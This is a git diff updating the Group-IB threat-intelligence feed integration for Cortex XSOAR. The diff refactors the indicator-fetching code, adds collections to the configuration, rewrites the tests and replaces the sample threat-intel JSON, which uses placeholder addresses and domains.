"trafficlightprotocol" + ), + "gibcollection": self.collection_name, + } + ) + demisto.debug( + f"Updated find_iocs_in_feed additional fields: {add_fields}" + ) + + # Create the raw JSON object + if indicator_value is not None and indicator_value != "": + raw_json = { + "value": indicator_value, + "type": indicator_type, + **add_fields, + } + if self.tags: + add_fields.update({"tags": self.tags}) + raw_json.update({"tags": self.tags}) + + indicators.append( + { + "value": indicator_value, + "type": indicator_type, + "rawJSON": raw_json, + "fields": add_fields, + } + ) + demisto.debug( + f"Added indicator find_iocs_in_feed: {indicator_value} of type: {indicator_type}" + ) + + demisto.debug(f"Final list of find_iocs_in_feed indicators: {indicators}") + + indicators = IndicatorBuilding.transform_list_to_str(indicators) + return indicators + + def get_indicators(self) -> list: + indicators = [] + results = [] + for feed in self.parsed_json: + indicators.extend(self.find_iocs_in_feed(feed)) + if (self.limit is not None) and len(indicators) >= self.limit: + indicators = indicators[: self.limit] + break + indicators = IndicatorBuilding.clean_data(indicators) + + if self.build_for_comand: + sorted_indicators = IndicatorBuilding.sorting_indicators(indicators) + + for type_, indicator in sorted_indicators.items(): + results.append( + CommandResults( + readable_output=IndicatorBuilding.get_human_readable_feed( + indicator, type_, self.collection_name + ), + raw_response=self.parsed_json, + ignore_auto_extract=True, + ) + ) + + return results if self.build_for_comand is True else indicators + + +class DateHelper: + + @staticmethod + def handle_first_time_fetch(last_run, collection_name, first_fetch_time): + last_fetch = last_run.get("last_fetch", {}).get(collection_name) + + # Handle first time fetch + date_from = None + seq_update = None + if not last_fetch: + date_from_for_mypy = dateparser.parse(first_fetch_time) + if date_from_for_mypy is None: + raise DemistoException( + "Inappropriate indicators_first_fetch format, " + "please use something like this: 2020-01-01 or January 1 2020 or 3 days." + f"It's now been received: {date_from}" + ) + date_from = date_from_for_mypy.strftime("%Y-%m-%d") + else: + seq_update = last_fetch -def find_iocs_in_feed(feed: dict, collection_name: str, common_fields: dict) -> list: - """ - Finds IOCs in the feed and transform them to the appropriate format to ingest them into Demisto. + return date_from, seq_update - :param feed: feed from GIB TI&A. - :param collection_name: which collection this feed belongs to. - :param common_fields: fields defined by user. - """ - indicators = [] - indicators_info = MAPPING.get(collection_name, {}).get('indicators', []) - for i in indicators_info: - main_field = find_element_by_key(feed, i['main_field']) - main_field_type = i['main_field_type'] - add_fields = [] - add_fields_list = i.get('add_fields', []) + ['id'] - for j in add_fields_list: - add_fields.append(find_element_by_key(feed, j)) - add_fields_types = i.get('add_fields_types', []) + ['gibid'] - for field_type in COMMON_FIELD_TYPES: - if common_fields.get(field_type): - add_fields.append(common_fields.get(field_type)) - add_fields_types.append(field_type) - if collection_name in ['apt/threat', 'hi/threat', 'malware/cnc']: - add_fields.append(', '.join(find_element_by_key(feed, "malwareList.name"))) - add_fields_types = add_fields_types + ['gibmalwarename'] - indicators.extend(unpack_iocs(main_field, main_field_type, add_fields, - add_fields_types, collection_name)) - return indicators +def validate_launch_get_indicators_command(limit, collection_name): + try: + if limit > 50: + raise Exception("A limit should be lower than 50.") + except ValueError: + raise Exception("A limit should be a number, not a string.") + if collection_name not in COMMON_MAPPING.keys(): + raise Exception( + "Incorrect collection name. Please, choose one of the displayed options." + ) -def get_human_readable_feed(indicators: list, type_: str, collection_name: str) -> str: - headers = ['value', 'type'] - for fields in MAPPING.get(collection_name, {}).get('indicators', {}): - if fields.get('main_field_type') == type_: - headers.extend(fields['add_fields_types']) - break - if collection_name in ['apt/threat', 'hi/threat', 'malware/cnc']: - headers.append('gibmalwarename') - return tableToMarkdown(f"{type_} indicators", indicators, - removeNull=True, headers=headers) - - -def format_result_for_manual(indicators: list) -> dict: - formatted_indicators: dict[str, Any] = {} - for indicator in indicators: - indicator = indicator.get('rawJSON') - type_ = indicator.get('type') - if type_ == 'CVE': - del indicator["gibsoftwaremixed"] - if formatted_indicators.get(type_) is None: - formatted_indicators[type_] = [indicator] - else: - formatted_indicators[type_].append(indicator) - return formatted_indicators - - -def handle_first_time_fetch(last_run, collection_name, first_fetch_time): - last_fetch = last_run.get('last_fetch', {}).get(collection_name) - - # Handle first time fetch - date_from = None - seq_update = None - if not last_fetch: - date_from_for_mypy = dateparser.parse(first_fetch_time) - if date_from_for_mypy is None: - raise DemistoException('Inappropriate indicators_first_fetch format, ' - 'please use something like this: 2020-01-01 or January 1 2020 or 3 days') - date_from = date_from_for_mypy.strftime('%Y-%m-%d') - else: - seq_update = last_fetch - return date_from, seq_update +""" Commands """ -""" Commands """ +def collection_availability_check(client: Client, collection_name: str) -> None: + if collection_name not in client.get_available_collections_proxy_function(): + raise Exception( + f"Collection {collection_name} is not available from you, " + "please disable collection on it or contact Group-IB to grant access" + f"{client.get_available_collections_proxy_function()}" + ) -def fetch_indicators_command(client: Client, last_run: dict, first_fetch_time: str, - indicator_collections: list, requests_count: int, - common_fields: dict) -> tuple[dict, list]: +def fetch_indicators_command( + client: Client, + last_run: dict, + first_fetch_time: str, + indicator_collections: list, + requests_count: int, + common_fields: dict, +) -> tuple[dict, list]: """ This function will execute each interval (default is 1 minute). @@ -776,28 +1285,45 @@ def fetch_indicators_command(client: Client, last_run: dict, first_fetch_time: s """ indicators = [] next_run: dict[str, dict[str, int | Any]] = {"last_fetch": {}} - tags = common_fields.pop("tags", []) + for collection_name in indicator_collections: - date_from, seq_update = handle_first_time_fetch(last_run=last_run, collection_name=collection_name, - first_fetch_time=first_fetch_time) - - generator = client.create_update_generator(collection_name=collection_name, - date_from=date_from, seq_update=seq_update) - k = 0 - for portion in generator: - for feed in portion: - seq_update = feed.get('seqUpdate') - indicators.extend(find_iocs_in_feed(feed, collection_name, common_fields)) - k += 1 - if k >= requests_count: + collection_availability_check(client=client, collection_name=collection_name) + mapping: dict = COMMON_MAPPING.get(collection_name, {}) + requests_sent = 0 + date_from, seq_update = DateHelper.handle_first_time_fetch( + last_run=last_run, + collection_name=collection_name, + first_fetch_time=first_fetch_time, + ) + + if collection_name in COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES: + hunting_rules = 1 + else: + hunting_rules = None + + portions = client.create_update_generator_proxy_functions( + collection_name=collection_name, + date_from=date_from, + sequpdate=seq_update, + apply_hunting_rules=hunting_rules, + ) + # print('portions', portions) + for portion in portions: + seq_update = portion.sequpdate + parsed_json: list[dict] = portion.parse_portion(keys=mapping.get("parser_mapping")) # type: ignore + builded_indicators = IndicatorBuilding( + parsed_json=parsed_json, + collection_name=collection_name, + common_fields=common_fields, + collection_mapping=mapping, + ).get_indicators() + + indicators.extend(builded_indicators) + requests_sent += 1 + if requests_sent >= requests_count: break - if tags: - for indicator in indicators: - indicator["fields"].update({"tags": tags}) - indicator["rawJSON"].update({"tags": tags}) - - next_run['last_fetch'][collection_name] = seq_update + next_run["last_fetch"][collection_name] = seq_update return next_run, indicators @@ -810,93 +1336,116 @@ def get_indicators_command(client: Client, args: dict[str, str]): :param args: arguments, provided by client. """ - id_, collection_name = args.get('id'), args.get('collection', '') - indicators = [] - raw_json = None - try: - limit = int(args.get('limit', '50')) - if limit > 50: - raise Exception('A limit should be lower than 50.') - except ValueError: - raise Exception('A limit should be a number, not a string.') + id_, collection_name, limit = ( + args.get("id"), + args.get("collection", ""), + int(args.get("limit", "50")), + ) + + validate_launch_get_indicators_command(limit, collection_name) + mapping: dict = COMMON_MAPPING.get(collection_name, {}) - if collection_name not in MAPPING.keys(): - raise Exception('Incorrect collection name. Please, choose one of the displayed options.') + indicators = [] if not id_: - generator = client.create_search_generator(collection_name=collection_name, limit=limit) - for portion in generator: - for feed in portion: - indicators.extend(find_iocs_in_feed(feed, collection_name, {})) - if len(indicators) >= limit: - indicators = indicators[:limit] - break + if collection_name in COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES: + apply_hunting_rules = 1 + else: + apply_hunting_rules = None + portions = client.create_update_generator_proxy_functions( + collection_name=collection_name, + limit=limit, + apply_hunting_rules=apply_hunting_rules, + ) + for portion in portions: + parsed_json = portion.parse_portion(keys=mapping.get("parser_mapping")) + builded_indicators = IndicatorBuilding( + parsed_json=parsed_json, + collection_name=collection_name, + common_fields={}, + limit=limit, + collection_mapping=mapping, + build_for_comand=True, + ).get_indicators() + indicators.extend(builded_indicators) + if len(indicators) >= limit: break else: - raw_json = client.search_feed_by_id(collection_name=collection_name, feed_id=id_) - indicators.extend(find_iocs_in_feed(raw_json, collection_name, {})) - if len(indicators) >= limit: - indicators = indicators[:limit] - - formatted_indicators = format_result_for_manual(indicators) - results = [] - for type_, indicator in formatted_indicators.items(): - results.append(CommandResults( - readable_output=get_human_readable_feed(indicator, type_, collection_name), - raw_response=raw_json, - ignore_auto_extract=True - )) - return results + portions = client.poller.search_feed_by_id( + collection_name=collection_name, feed_id=id_ + ) + portions.get_iocs() + parsed_json = portions.parse_portion(keys=mapping.get("parser_mapping")) + builded_indicators = IndicatorBuilding( + parsed_json=parsed_json, # type: ignore + collection_name=collection_name, + common_fields={}, + limit=limit, + collection_mapping=mapping, + build_for_comand=True, + ).get_indicators() + indicators.extend(builded_indicators) + + return indicators def main(): # pragma: no cover """ - PARSE AND VALIDATE INTEGRATION PARAMS + PARSE AND VALIDATE INTEGRATION PARAMS """ - params = demisto.params() - username = params.get('credentials').get('identifier') - password = params.get('credentials').get('password') - proxy = params.get('proxy', False) - verify_certificate = not params.get('insecure', False) - base_url = str(params.get("url")) - - indicator_collections = params.get('indicator_collections', []) - indicators_first_fetch = params.get('indicators_first_fetch', '3 days').strip() - requests_count = int(params.get('requests_count', 2)) - - args = demisto.args() - command = demisto.command() - LOG(f'Command being called is {command}') + indicator_collections = None try: + params = demisto.params() + credentials: dict = params.get("credentials") # type: ignore + username = credentials.get("identifier") + password = credentials.get("password") + proxy = params.get("proxy", False) + verify_certificate = not params.get("insecure", False) + base_url = str(params.get("url")) + + indicator_collections = params.get("indicator_collections", []) + indicators_first_fetch = params.get("indicators_first_fetch", "3 days").strip() + requests_count = int(params.get("requests_count", 2)) + + args = demisto.args() + command = demisto.command() + LOG(f"Command being called is {command}") + demisto.debug(f"Command being called is {command}") + client = Client( base_url=base_url, verify=verify_certificate, auth=(username, password), proxy=proxy, - headers={ - "Accept": "*/*", - "User-Agent": f"SOAR/CortexSOAR/{username}/unknown" - }) + headers={"Accept": "*/*"}, + ) - commands = {'gibtia-get-indicators': get_indicators_command} + commands = {"gibtia-get-indicators": get_indicators_command} - if command == 'test-module': + if command == "test-module": # This is the call made when pressing the integration Test button. result = test_module(client) demisto.results(result) - elif command == 'fetch-indicators': + elif command == "fetch-indicators": # Set and define the fetch incidents command to run after activated via integration settings. + tlp_color = params.get("tlp_color") + tags = argToList(params.get("feedTags")) common_fields = { - 'trafficlightprotocol': params.get("tlp_color"), - 'tags': argToList(params.get("feedTags")), + "trafficlightprotocol": tlp_color, + "tags": tags, } - next_run, indicators = fetch_indicators_command(client=client, last_run=get_integration_context(), - first_fetch_time=indicators_first_fetch, - indicator_collections=indicator_collections, - requests_count=requests_count, - common_fields=common_fields) + next_run, indicators = fetch_indicators_command( + client=client, + last_run=get_integration_context(), + first_fetch_time=indicators_first_fetch, + indicator_collections=indicator_collections, + requests_count=requests_count, + common_fields=common_fields, + ) + demisto.debug(f"fetch-indicators lenght indicators: {len(indicators)}") + set_integration_context(next_run) for b in batch(indicators, batch_size=2000): demisto.createIndicators(b) # type: ignore @@ -905,9 +1454,13 @@ def main(): # pragma: no cover return_results(commands[command](client, args)) # Log exceptions - except Exception as e: - return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}') + except Exception: + return_error( + f"Failed to execute {demisto.command()} command.\n" + f"Indicator collections: {indicator_collections}.\n" + f"Error: {format_exc()}" + ) -if __name__ in ('__main__', '__builtin__', 'builtins'): +if __name__ in ("__main__", "__builtin__", "builtins"): main() diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml index 5eacfeb19ddf..180a4751c1c9 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml @@ -74,18 +74,22 @@ configuration: display: Indicator collections name: indicator_collections options: + - compromised/account_group + - compromised/bank_card_group - compromised/mule - - compromised/imei - attacks/ddos - attacks/deface - - attacks/phishing - attacks/phishing_kit + - attacks/phishing_group - hi/threat - apt/threat - osi/vulnerability + - osi/git_repository - suspicious_ip/tor_node - suspicious_ip/open_proxy - suspicious_ip/socks_proxy + - suspicious_ip/vpn + - suspicious_ip/scanner - malware/cnc - ioc/common type: 16 @@ -133,6 +137,7 @@ configuration: - never - interval - indicatorType + - suddenDeath - display: '' name: feedExpirationInterval type: 1 @@ -147,18 +152,22 @@ script: description: GIB Collection to get indicators from. name: collection predefined: + - compromised/account_group + - compromised/bank_card_group - compromised/mule - - compromised/imei - attacks/ddos - attacks/deface - - attacks/phishing - attacks/phishing_kit + - attacks/phishing_group - hi/threat - apt/threat - osi/vulnerability + - osi/git_repository - suspicious_ip/tor_node - suspicious_ip/open_proxy - suspicious_ip/socks_proxy + - suspicious_ip/vpn + - suspicious_ip/scanner - malware/cnc - ioc/common required: true @@ -189,7 +198,7 @@ script: name: gibtia-get-indicators deprecated: false execution: false - dockerimage: demisto/python3:3.11.10.115186 + dockerimage: demisto/vendors-sdk:1.0.0.2073752 feed: true runonce: false script: '-' diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py index 811b06c81a84..5406cdd29d42 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py @@ -1,34 +1,149 @@ import pytest +import os from json import load -from GroupIB_TIA_Feed import fetch_indicators_command, Client +from GroupIB_TIA_Feed import fetch_indicators_command, Client, main +from urllib3.exceptions import InsecureRequestWarning +from urllib3 import disable_warnings as urllib3_disable_warnings +from cyberintegrations.cyberintegrations import Parser +# Disable insecure warnings +urllib3_disable_warnings(InsecureRequestWarning) -with open('test_data/example.json') as examples: - RAW_JSON = load(examples) -with open('test_data/results.json') as results: - RESULTS = load(results) COLLECTION_NAMES = [ - 'compromised/mule', 'compromised/imei', 'attacks/ddos', 'attacks/deface', - 'attacks/phishing', 'attacks/phishing_kit', 'apt/threat', - 'suspicious_ip/tor_node', 'suspicious_ip/open_proxy', 'suspicious_ip/socks_proxy', - 'malware/cnc', 'osi/vulnerability', 'ioc/common' + "compromised/account_group", + "compromised/bank_card_group", + "compromised/mule", + "attacks/ddos", + "attacks/deface", + "attacks/phishing_kit", + "attacks/phishing_group", + "apt/threat", + "hi/threat", + "suspicious_ip/tor_node", + "suspicious_ip/open_proxy", + "suspicious_ip/socks_proxy", + "suspicious_ip/vpn", + "suspicious_ip/scanner", + "malware/cnc", + "osi/vulnerability", + "osi/git_repository", + "ioc/common", ] +realpath = os.path.join(os.path.dirname(os.path.realpath(__file__))) -@pytest.fixture(scope='function', params=COLLECTION_NAMES, ids=COLLECTION_NAMES) +with open(f'{realpath}/test_data/avalible_collections_example.json') as example: + AVALIBLE_COLLECTIONS_RAW_JSON = load(example) + +with open(f'{realpath}/test_data/main_collections_examples.json') as example: + COLLECTIONS_RAW_JSON = load(example) + + +@pytest.fixture(scope='function', params=COLLECTION_NAMES) def session_fixture(request): - return request.param, Client(base_url='https://some.ru') + """ + Fixture for setting up a session with a client instance specific to each collection. + + Given: + - COLLECTION_NAMES, a list of collection names representing different data types + that the integration handles. + + When: + - Each test function uses this fixture to set up a unique session with a particular + collection name. + + Then: + - Returns a tuple containing: + - The current collection name as a parameter for test functions that may need it. + - An instance of Client configured with the specified base URL, authentication, + and necessary headers for the integration. + - This fixture allows parameterized tests that run independently for each collection, + providing an isolated client setup for each run. + """ + return request.param, Client( + base_url="https://some-url.com", + auth=("example@roup-ib.com", "exampleAPI_TOKEN"), + verify=True, + headers={"Accept": "*/*"}, + ) + + +def test_main_error(): + """ + Test for verifying the error-handling behavior in the main() function. + + Given: + - A main() function configured to raise an exception when calling error_command. + + When: + - The main function invokes error_command(), which is expected to trigger an error. + + Then: + - Ensures that a SystemExit exception is raised as expected. + - The test checks that the main function handles errors in a predictable and controlled + manner, allowing graceful exits during failure. + """ + with pytest.raises(SystemExit): + main()["error_command"]() # type: ignore def test_fetch_indicators_command(mocker, session_fixture): + """ + Test for validating the functionality of fetch_indicators_command with multiple collection types. + + Given: + - A session_fixture that supplies a client instance configured for a specific collection + name for each test iteration. + - collection_name, the current collection name being tested (e.g., "compromised/mule"). + + When: + - The fetch_indicators_command() function is called with: + - An empty last_run dictionary to indicate that this is the initial data fetch. + - first_fetch_time set based on specific collection conditions: + - For "compromised/mule", first_fetch_time is set to a fixed date of "2023-01-01". + - For "attacks/deface", first_fetch_time is set to "2024-10-01". + - For all other collections, first_fetch_time is set to "15 days" as a general + recent timeframe. + - indicator_collections set to a list containing only the current collection_name. + - requests_count set to 3, which limits the number of requests per fetch. + - common_fields set to an empty dictionary for simplicity, as no specific common + fields are required for this test. + + Then: + - Validates that: + - "last_fetch" is a key in next_run, indicating that the command updates last_run + data with the latest fetch time. + - The first indicator in the indicators list contains a "fields" dictionary with + a "gibid" key, verifying that each indicator has the expected structure. + - This test ensures that fetch_indicators_command retrieves data according to each + collection’s parameters and formats the output consistently. + """ collection_name, client = session_fixture - mocker.patch.object(client, 'create_update_generator', return_value=[[RAW_JSON[collection_name]]]) - next_run, indicators = fetch_indicators_command(client=client, last_run={}, first_fetch_time='3 days', - indicator_collections=[collection_name], requests_count=1, - common_fields={}) - expected_next_run, expected_indicators = RESULTS[collection_name] - assert next_run == expected_next_run - for i in range(len(expected_indicators)): - raw_json = indicators[i].get("rawJSON") - expected_raw_json = expected_indicators[i].get("rawJSON") - assert sorted(raw_json.items()) == sorted(expected_raw_json.items()) + if collection_name == "compromised/mule": + first_fetch_time = "2023-01-01" + elif collection_name == "attacks/deface": + first_fetch_time = "2024-10-01" + else: + first_fetch_time = "15 days" + + mocker.patch.object(client, 'get_available_collections_proxy_function', return_value=AVALIBLE_COLLECTIONS_RAW_JSON) + mocker.patch.object(client, 'create_update_generator_proxy_functions', return_value=[ + Parser(chunk=COLLECTIONS_RAW_JSON[collection_name], keys=[], iocs_keys=[])]) + + next_run, indicators = fetch_indicators_command( + client=client, + last_run={}, + first_fetch_time=first_fetch_time, + indicator_collections=[collection_name], + requests_count=3, + common_fields={} + ) + + assert "last_fetch" in next_run, ( + "Expected 'last_fetch' key in next_run to indicate the last data retrieval time." + ) + if len(indicators) > 0: + assert "gibid" in indicators[0].get('fields'), ( + "Expected 'gibid' field in the first indicator's 'fields' dictionary, ensuring each indicator " + "includes unique identifier data." + ) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/command_examples.txt b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/command_examples.txt index ef025362ab44..f584d23a1ab4 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/command_examples.txt +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/command_examples.txt @@ -1 +1 @@ -!gibtia-get-indicators collection=compromised/mule \ No newline at end of file +!gibtia-get-indicators collection=ioc/common \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/avalible_collections_example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/avalible_collections_example.json new file mode 100644 index 000000000000..8ac723ea3d9b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/avalible_collections_example.json @@ -0,0 +1,38 @@ +[ + "apt/threat", + "apt/threat_actor", + "hi/threat", + "hi/threat_actor", + "attacks/ddos", + "attacks/deface", + "attacks/phishing_group", + "attacks/phishing_kit", + "compromised/access", + "compromised/account_group", + "compromised/bank_card_group", + "compromised/breached", + "compromised/discord", + "compromised/masked_card", + "compromised/messenger", + "compromised/mule", + "compromised/reaper", + "ioc/common", + "malware/cnc", + "malware/config", + "malware/malware", + "malware/signature", + "malware/yara", + "osi/git_repository", + "osi/public_leak", + "osi/vulnerability", + "suspicious_ip/open_proxy", + "suspicious_ip/scanner", + "suspicious_ip/socks_proxy", + "suspicious_ip/tor_node", + "suspicious_ip/vpn", + "compromised/breached", + "compromised/account_group", + "compromised/reaper", + "compromised/bank_card_group", + "attacks/phishing_group" +] \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/example.json deleted file mode 100644 index 278a37493b94..000000000000 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/example.json +++ /dev/null @@ -1,713 +0,0 @@ -{ - "compromised/mule": { - "account": "3765123456411567", - "cnc": { - "cnc": "http://some.ru", - "domain": "worus.space", - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": "11.11.11.11", - "provider": null, - "region": null - }, - "ipv6": null, - "url": "http://some.ru" - }, - "dateAdd": "2020-11-11T16:09:00+00:00", - "dateIncident": null, - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 100, - "severity": "red", - "tlp": "amber", - "ttl": 30 - }, - "id": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "info": null, - "isFavourite": false, - "isHidden": false, - "malware": { - "id": "5a2b741f8593f88178623848573abc899f9157d4", - "name": "Anubis" - }, - "oldId": "392993084", - "organization": { - "bic": null, - "bicRu": null, - "bsb": null, - "iban": null, - "name": "SOME BANK", - "swift": null - }, - "person": { - "address": null, - "birthday": null, - "city": null, - "countryCode": null, - "email": null, - "name": null, - "passport": null, - "phone": null, - "state": null, - "taxNumber": null, - "zip": null - }, - "portalLink": "https://bt.group-ib.com/cd/mules?searchValue=id:50a3b4abbfca5dcbec9c8b3a110598f61ba90a99", - "seqUpdate": 1614413286419, - "sourceType": "Botnet", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - }, - "type": "Person" - }, - "compromised/imei": { - "client": { - "ipv4": { - "asn": "AS22222 Some Company", - "city": null, - "countryCode": "NL", - "countryName": "Netherlands", - "ip": "11.11.11.11", - "provider": "Some Company", - "region": null - } - }, - "cnc": { - "cnc": "http://some.ru", - "domain": "some.ru", - "ipv4": { - "asn": "AS16276 OVH SAS", - "city": null, - "countryCode": "FR", - "countryName": "France", - "ip": "11.11.11.11", - "provider": "OVH SAS", - "region": null - }, - "ipv6": null, - "url": "http://some.ru" - }, - "dateCompromised": null, - "dateDetected": "2018-01-11T01:18:43+00:00", - "device": { - "iccid": ",~", - "imei": "359223056231009", - "imsi": ",~", - "model": "Nexus S/2.3.7 ($$$Flexnet v.5.5)", - "os": null - }, - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 100, - "severity": "red", - "tlp": "red", - "ttl": 30 - }, - "id": "0c1426048474df19ada9d0089ef8b3efce906556", - "isFavourite": false, - "isHidden": false, - "malware": { - "id": "8790a290230b3b4c059c2516a6adace1eac16066", - "name": "FlexNet" - }, - "oldId": "396766002", - "operator": { - "countryCode": null, - "name": null, - "number": ",~" - }, - "portalLink": "https://bt.group-ib.com/cd/imei?searchValue=id:0c1426048474df19ada9d0089ef8b3efce906556", - "seqUpdate": 1614889064899, - "sourceType": "Botnet", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - } - }, - "attacks/ddos": { - "cnc": { - "cnc": "isc.org", - "domain": "isc.org", - "ipv4": { - "asn": "AS1280 Internet Systems Consortium, Inc.", - "city": "Redwood City", - "countryCode": "US", - "countryName": "United States", - "ip": "11.11.11.11", - "provider": "Internet Systems Consortium", - "region": "California" - }, - "ipv6": null, - "url": null - }, - "dateBegin": "2020-10-16T02:58:53+00:00", - "dateEnd": "2020-10-16T02:58:55+00:00", - "dateReg": "202-10-16", - "evaluation": { - "admiraltyCode": "A2", - "credibility": 90, - "reliability": 90, - "severity": "red", - "tlp": "green", - "ttl": 30 - }, - "id": "26a05baa4025edff367b058b13c6b43e820538a5", - "isFavourite": false, - "isHidden": false, - "malware": null, - "messageLink": null, - "oldId": "394657345", - "portalLink": "https://bt.group-ib.com/attacks/ddos?searchValue=id:26a05baa4025edff367b058b13c6b43e820538a5", - "protocol": "udp", - "seqUpdate": 1614476823510, - "target": { - "ipv4": { - "asn": "AS1298 Comcast Cable Communications", - "city": "Some city", - "countryCode": "US", - "countryName": "United States", - "ip": "11.11.11.11", - "provider": "Comcast Cable", - "region": "Washington" - }, - "url": null, - "category": null, - "domainsCount": 0, - "port": 55843, - "domain": null - }, - "threatActor": null, - "type": "DNS Reflection" - }, - "attacks/deface": { - "contacts": [], - "date": "2021-01-12T02:22:18+00:00", - "evaluation": { - "admiraltyCode": "B2", - "credibility": 80, - "reliability": 80, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "id": "6009637a1135cd001ef46e21", - "portalLink": "https://bt.group-ib.com/attacks/deface?searchValue=id:6009637a1135cd001ef46e21", - "seqUpdate": 26326167, - "source": "www.some.org", - "targetDomain": "sadas.sadd.ee", - "targetDomainProvider": null, - "targetIp": { - "asn": null, - "city": "", - "countryCode": null, - "countryName": "Indonesia", - "ip": "11.11.11.11", - "provider": null, - "region": null - }, - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - }, - "url": "sadas.sadd.ee" - }, - "attacks/phishing": { - "dateBlocked": null, - "dateDetected": "2021-01-14T11:21:34+00:00", - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 90, - "severity": "red", - "tlp": "amber", - "ttl": 30 - }, - "history": [ - { - "date": "2021-01-13T11:20:50+00:00", - "field": "Detected", - "reason": "In response", - "reporter": "Group-IB Intelligence", - "value": "In response" - }, - { - "date": "2021-01-14T11:20:50+00:00", - "field": "Status has been changed", - "reason": ",-", - "reporter": "Group-IB Intelligence", - "value": "In response" - } - ], - "id": "fce7f92d0b64946cf890842d083953649b259952", - "ipv4": { - "asn": null, - "city": "Some city", - "countryCode": "CA", - "countryName": "Canada", - "ip": "11.11.11.11", - "provider": "Some provider", - "region": "NA" - }, - "isFavourite": false, - "isHidden": false, - "oldId": "396798526", - "phishingDomain": { - "domain": "some.ru", - "local": "some.ru", - "dateRegistered": "2013-11-15 13:41:30", - "title": "", - "registrar": "Some" - }, - "portalLink": "https://bt.group-ib.com/attacks/phishing?searchValue=id:fce7f92d0b64946cf890842d083953649b259952", - "seqUpdate": 1614925293641, - "status": "In response", - "targetBrand": "Some brand", - "targetCategory": "Finance > Banking", - "targetCountryName": null, - "targetDomain": "some.ru", - "type": "Phishing", - "url": "https://some.ru" - }, - "attacks/phishing_kit": { - "dateDetected": "2021-01-14T12:10:41+00:00", - "dateFirstSeen": "2021-01-14T13:10:41+00:00", - "dateLastSeen": "2021-01-14T14:12:17+00:00", - "downloadedFrom": [ - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - }, - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - }, - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - } - ], - "emails": [], - "evaluation": { - "admiraltyCode": "B2", - "credibility": 70, - "reliability": 80, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "hash": "8d7ea805fe20d6d77f57e2f0cadd17b1", - "id": "044f3f2cb599228c1882884eb77eb073f68a25f2", - "isFavourite": false, - "isHidden": false, - "oldId": "396793696", - "path": "https://tap.group-ib.com/api/api/v2/web/attacks/phishing_kit/044f3f2cb599228c1882884eb77eb073f68a25f2/file/95b61a1df152012abb79c3951ed98680e0bd917bbcf1d440e76b66a120292c76", - "portalLink": "https://bt.group-ib.com/attacks/phishing_kit?searchValue=id:044f3f2cb599228c1882884eb77eb073f68a25f2", - "seqUpdate": 1614921031175, - "targetBrand": [], - "tsFirstSeen": null, - "tsLastSeen": null, - "variables": null - }, - "apt/threat": { - "contacts": [], - "countries": [], - "createdAt": "2021-01-15T16:53:20+03:00", - "cveList": [], - "dateFirstSeen": "2021-01-15", - "dateLastSeen": "2021-01-15", - "datePublished": "2021-01-15", - "description": "sdasdsa", - "displayOptions": { - "isFavourite": false, - "isHidden": false - }, - "evaluation": { - "admiraltyCode": "B1", - "credibility": 100, - "reliability": 80, - "severity": "orange", - "tlp": "amber", - "ttl": null - }, - "expertise": [], - "files": [ - { - "hash": "612312f6cf9d2e6c978898117b7b5b85035b3d5e67c4ee266879868c9eb24dd3", - "mime": "image/png", - "name": "612312f6cf9d2e6c978898117b7b5b85035b3d5e67c4ee266879868c9eb24dd3", - "size": 209254 - } - ], - "forumsAccounts": [], - "id": "1b09d389d016121afbffe481a14b30ea995876e4", - 